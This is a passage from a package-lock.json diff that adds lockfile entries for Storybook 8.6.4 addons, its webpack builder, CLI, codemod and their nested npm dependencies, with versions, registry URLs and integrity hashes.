"https://registry.npmjs.org/@storybook/addon-essentials/-/addon-essentials-8.6.4.tgz", + "integrity": "sha512-3pF0ZDl5EICqe0eOupPQq6PxeupwkLsfTWANuuJUYTJur82kvJd3Chb7P9vqw0A0QBx6106mL6PIyjrFJJMhLg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/addon-actions": "8.6.4", + "@storybook/addon-backgrounds": "8.6.4", + "@storybook/addon-controls": "8.6.4", + "@storybook/addon-docs": "8.6.4", + "@storybook/addon-highlight": "8.6.4", + "@storybook/addon-measure": "8.6.4", + "@storybook/addon-outline": "8.6.4", + "@storybook/addon-toolbars": "8.6.4", + "@storybook/addon-viewport": "8.6.4", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-highlight": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-highlight/-/addon-highlight-8.6.4.tgz", + "integrity": "sha512-jFREXnSE/7VuBR8kbluN+DBVkMXEV7MGuCe8Ytb1/D2Q0ohgJe395dfVgEgSMXErOwsn//NV/NgJp6JNXH2DrA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-interactions": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-interactions/-/addon-interactions-8.6.4.tgz", + "integrity": "sha512-MZAAZjyvmJXCvM35zEiPpXz7vK+fimovt+WZKAMayAbXy5fT+7El0c9dDyTQ2norNKNj9QU/8hiU/1zARSUELQ==", + "dev": true, + 
"license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@storybook/instrumenter": "8.6.4", + "@storybook/test": "8.6.4", + "polished": "^4.2.2", + "ts-dedent": "^2.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-links": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-links/-/addon-links-8.6.4.tgz", + "integrity": "sha512-TaSIteYLJ12+dVBk7fW96ZvNIFizKs+Vo/YuNAe4xTzFJRrjLkFj9htLVi/dusMfn7lYo5DHIns08LuM+po1Dg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "react": { + "optional": true + } + } + }, + "node_modules/@storybook/addon-measure": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-measure/-/addon-measure-8.6.4.tgz", + "integrity": "sha512-IpVL1rTy1tO8sy140eU3GdVB1QJ6J62+V6GSstcmqTLxDJQk5jFfg7hVbPEAZZ2sPFmeyceP9AMoBBo0EB355A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "tiny-invariant": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-outline": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-outline/-/addon-outline-8.6.4.tgz", + "integrity": "sha512-28nAslKTy0zWMdxAZcipMDYrEp1TkXVooAsqMGY5AMXMiORi1ObjhmjTLhVt1dXp+aDg0X+M3B6PqoingmHhqQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-styling-webpack": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@storybook/addon-styling-webpack/-/addon-styling-webpack-1.0.1.tgz", + "integrity": "sha512-5n+SXPfMTc4m7sWaJWPWjoHYWc6/B111M2Ia55toQ3GV4ON4vVlTgH9FX+EgCkDticElj99HLTMDJkHRj2yvkg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/node-logger": "^8.0.0-alpha.10" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/@storybook/addon-toolbars": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-toolbars/-/addon-toolbars-8.6.4.tgz", + "integrity": "sha512-PU2lvgwCKDn93zpp5MEog103UUmSSugcxDf18xaoa9D15Qtr+YuQHd2hXbxA7+dnYL9lA7MLYsstfxE91ieM4Q==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/addon-viewport": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/addon-viewport/-/addon-viewport-8.6.4.tgz", + "integrity": "sha512-O5Ij+SRVg6grY6JOL5lOpsFyopZxuZEl2GHfh2SUf9hfowNS0QAgFpJupqXkwZzRSrlf9uKrLkjB6ulLgN2gOQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "memoizerific": "^1.11.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } 
+ }, + "node_modules/@storybook/addon-webpack5-compiler-babel": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/@storybook/addon-webpack5-compiler-babel/-/addon-webpack5-compiler-babel-3.0.5.tgz", + "integrity": "sha512-9dlc5PrehEFUHqkgj8x+aKtOY9XH9Zk6WBbtpgY/JCQ7waJ2VvhyDnrgJeXfek+WYlSkJElnta6SlqP+XRG0PQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.26.0", + "babel-loader": "^9.2.1" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/blocks": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/blocks/-/blocks-8.6.4.tgz", + "integrity": "sha512-+oPXwT3KzJzsdkQuGEzBqOKTIFlb6qmlCWWbDwAnP0SEqYHoTVRTAIa44icFP0EZeIe+ypFVAm1E7kWTLmw1hQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/icons": "^1.2.12", + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "react": { + "optional": true + }, + "react-dom": { + "optional": true + } + } + }, + "node_modules/@storybook/builder-webpack5": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/builder-webpack5/-/builder-webpack5-8.6.4.tgz", + "integrity": "sha512-6fhjt3uiBZeapRbF477bkJ+ln+yA8vOz0qR86XTq79VrYY5AbBL6F8swVMk9LG1t49vYPR/UuPjYBxsUNKK8MQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core-webpack": "8.6.4", + "@types/semver": "^7.3.4", + "browser-assert": "^1.2.1", + "case-sensitive-paths-webpack-plugin": "^2.4.0", + "cjs-module-lexer": "^1.2.3", + "constants-browserify": "^1.0.0", + "css-loader": "^6.7.1", + "es-module-lexer": "^1.5.0", + "fork-ts-checker-webpack-plugin": "^8.0.0", + "html-webpack-plugin": "^5.5.0", + "magic-string": "^0.30.5", + "path-browserify": "^1.0.1", + "process": "^0.11.10", + "semver": "^7.3.7", + "style-loader": "^3.3.1", + "terser-webpack-plugin": "^5.3.1", + "ts-dedent": "^2.0.0", + "url": "^0.11.0", + "util": "^0.12.4", + "util-deprecate": "^1.0.2", + "webpack": "5", + "webpack-dev-middleware": "^6.1.2", + "webpack-hot-middleware": "^2.25.1", + "webpack-virtual-modules": "^0.6.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + 
"node_modules/@storybook/builder-webpack5/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/builder-webpack5/node_modules/punycode": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.4.1.tgz", + "integrity": "sha512-jmYNElW7yvO7TV33CjSmvSiE2yco3bV2czu/OzDKdMNVZQWfxCblURLhf+47syQRBntjfLdd/H0egrzIG+oaFQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/builder-webpack5/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/url": { + "version": "0.11.4", + "resolved": "https://registry.npmjs.org/url/-/url-0.11.4.tgz", + "integrity": "sha512-oCwdVC7mTuWiPyjLUz/COz5TLk6wgp0RCsN+wHZ2Ekneac9w8uuV0njcbbie2ME+Vs+d6duwmYuR3HgQXs1fOg==", + "dev": true, + "license": "MIT", + "dependencies": { + "punycode": "^1.4.1", + "qs": "^6.12.3" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/@storybook/builder-webpack5/node_modules/webpack-dev-middleware": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-6.1.3.tgz", + "integrity": "sha512-A4ChP0Qj8oGociTs6UdlRUGANIGrCDL3y+pmQMc+dSsraXHCatFpmMey4mYELA+juqwUqwQsUgJJISXl1KWmiw==", + "dev": true, + "license": "MIT", + "dependencies": { + "colorette": "^2.0.10", + "memfs": "^3.4.12", + "mime-types": "^2.1.31", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "node_modules/@storybook/cli": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/cli/-/cli-8.6.4.tgz", + "integrity": "sha512-iVw4B2Pe4/ERDkDeaXtXamFXatNgvtiA6G9p3wUpVSlxjgKW/JbjSwKAMTCsgDIj4dCMm8i0fzmiYXeg5Yprng==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.24.4", + "@babel/types": "^7.24.0", + "@storybook/codemod": "8.6.4", + "@types/semver": "^7.3.4", + "commander": "^12.1.0", + "create-storybook": "8.6.4", + "cross-spawn": "^7.0.3", + "envinfo": "^7.7.3", + "fd-package-json": "^1.2.0", + "find-up": "^5.0.0", + "giget": "^1.0.0", + "glob": "^10.0.0", + "globby": "^14.0.1", + "jscodeshift": "^0.15.1", + "leven": "^3.1.0", + 
"p-limit": "^6.2.0", + "prompts": "^2.4.0", + "semver": "^7.3.7", + "storybook": "8.6.4", + "tiny-invariant": "^1.3.1", + "ts-dedent": "^2.0.0" + }, + "bin": { + "cli": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/@storybook/cli/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/cli/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@storybook/cli/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/cli/node_modules/commander": { + "version": "12.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-12.1.0.tgz", + "integrity": "sha512-Vw8qHK3bZM9y/P10u3Vib8o/DdkvA2OtPtZvD871QKjy74Wj1WSKFILMPRPSdUSx5RFK1arlJzEtA4PkFgnbuA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/cli/node_modules/foreground-child": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", + "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", + "dev": true, + "license": "ISC", + "dependencies": { + "cross-spawn": "^7.0.6", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/glob": { + "version": "10.4.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", + "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "dev": true, + "license": "ISC", + "dependencies": { + "foreground-child": "^3.1.0", + "jackspeak": "^3.1.2", + "minimatch": "^9.0.4", + "minipass": "^7.1.2", + "package-json-from-dist": "^1.0.0", + "path-scurry": "^1.11.1" + }, + "bin": { + "glob": "dist/esm/bin.mjs" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/globby": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-14.1.0.tgz", + "integrity": "sha512-0Ia46fDOaT7k4og1PDW4YbodWWr3scS2vAr2lTbsplOt2WkKp0vQbkI9wKis/T5LV/dqPjO3bpS/z6GTJB82LA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@sindresorhus/merge-streams": "^2.1.0", + "fast-glob": "^3.3.3", + "ignore": "^7.0.3", + "path-type": "^6.0.0", + "slash": 
"^5.1.0", + "unicorn-magic": "^0.3.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/ignore": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.3.tgz", + "integrity": "sha512-bAH5jbK/F3T3Jls4I0SO1hmPR0dKU0a7+SY6n1yzRtG54FLO8d6w/nxLFX2Nb7dBu6cCWXPaAME6cYqFUMmuCA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/@storybook/cli/node_modules/jscodeshift": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.15.2.tgz", + "integrity": "sha512-FquR7Okgmc4Sd0aEDwqho3rEiKR3BdvuG9jfdHjLJ6JQoWSMpavug3AoIfnfWhxFlf+5pzQh8qjqz0DWFrNQzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.23.0", + "@babel/parser": "^7.23.0", + "@babel/plugin-transform-class-properties": "^7.22.5", + "@babel/plugin-transform-modules-commonjs": "^7.23.0", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.22.11", + "@babel/plugin-transform-optional-chaining": "^7.23.0", + "@babel/plugin-transform-private-methods": "^7.22.5", + "@babel/preset-flow": "^7.22.15", + "@babel/preset-typescript": "^7.23.0", + "@babel/register": "^7.22.15", + "babel-core": "^7.0.0-bridge.0", + "chalk": "^4.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.4", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.23.3", + "temp": "^0.8.4", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/@storybook/cli/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/minipass": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", + "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/@storybook/cli/node_modules/p-limit": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-6.2.0.tgz", + "integrity": "sha512-kuUqqHNUqoIWp/c467RI4X6mmyuojY5jGutNU0wVTmEOOfcuwLqyMVoAi9MKi2Ak+5i9+nhmrK4ufZE8069kHA==", + "dev": true, + "license": "MIT", + "dependencies": { + "yocto-queue": "^1.1.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/path-type": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-6.0.0.tgz", + "integrity": "sha512-Vj7sf++t5pBD637NSfkxpHSMfWaeig5+DKWLhcqIYx6mWQz5hdJTGDVMQiJcw1ZYkhs7AazKDGpRVji1LJCZUQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/semver": { + "version": "7.7.1", + 
"resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/cli/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@storybook/cli/node_modules/slash": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-5.1.0.tgz", + "integrity": "sha512-ZA6oR3T/pEyuqwMgAKT0/hAv8oAXckzbkmR0UkUosQ+Mc4RxGoJkRmwHgHufaenlyAgE1Mxgpdcrf75y6XcnDg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/cli/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/cli/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/@storybook/cli/node_modules/write-file-atomic/node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/@storybook/cli/node_modules/yocto-queue": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.2.0.tgz", + "integrity": "sha512-KHBC7z61OJeaMGnF3wqNZj+GGNXOyypZviiKpQeiHirG5Ib1ImwcLBH70rbMSkKfSmUNBsdf2PwaEJtKvgmkNw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/codemod/-/codemod-8.6.4.tgz", + "integrity": "sha512-HVB7py6vKB9OMzQ02aAhcqmyT/IDlYrT1960HO6LWRhcpztnBlOHAAlhM91DN8yqN0K47B+GsaN5eDzCT8ggBw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.24.4", + "@babel/preset-env": "^7.24.4", + "@babel/types": "^7.24.0", + "@storybook/core": "8.6.4", + "@types/cross-spawn": "^6.0.2", + "cross-spawn": "^7.0.3", + "es-toolkit": "^1.22.0", + "globby": "^14.0.1", + "jscodeshift": "^0.15.1", + "prettier": "^3.1.1", + "recast": "^0.23.5", + "tiny-invariant": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + 
"node_modules/@storybook/codemod/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/codemod/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/codemod/node_modules/globby": { + "version": "14.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-14.1.0.tgz", + "integrity": "sha512-0Ia46fDOaT7k4og1PDW4YbodWWr3scS2vAr2lTbsplOt2WkKp0vQbkI9wKis/T5LV/dqPjO3bpS/z6GTJB82LA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@sindresorhus/merge-streams": "^2.1.0", + "fast-glob": "^3.3.3", + "ignore": "^7.0.3", + "path-type": "^6.0.0", + "slash": "^5.1.0", + "unicorn-magic": "^0.3.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/ignore": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-7.0.3.tgz", + "integrity": "sha512-bAH5jbK/F3T3Jls4I0SO1hmPR0dKU0a7+SY6n1yzRtG54FLO8d6w/nxLFX2Nb7dBu6cCWXPaAME6cYqFUMmuCA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/@storybook/codemod/node_modules/jscodeshift": { + "version": "0.15.2", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.15.2.tgz", + "integrity": "sha512-FquR7Okgmc4Sd0aEDwqho3rEiKR3BdvuG9jfdHjLJ6JQoWSMpavug3AoIfnfWhxFlf+5pzQh8qjqz0DWFrNQzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.23.0", + "@babel/parser": "^7.23.0", + "@babel/plugin-transform-class-properties": "^7.22.5", + "@babel/plugin-transform-modules-commonjs": "^7.23.0", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.22.11", + "@babel/plugin-transform-optional-chaining": "^7.23.0", + "@babel/plugin-transform-private-methods": "^7.22.5", + "@babel/preset-flow": "^7.22.15", + "@babel/preset-typescript": "^7.23.0", + "@babel/register": "^7.22.15", + "babel-core": "^7.0.0-bridge.0", + "chalk": "^4.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.4", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.23.3", + "temp": "^0.8.4", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/@storybook/codemod/node_modules/path-type": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-6.0.0.tgz", + "integrity": 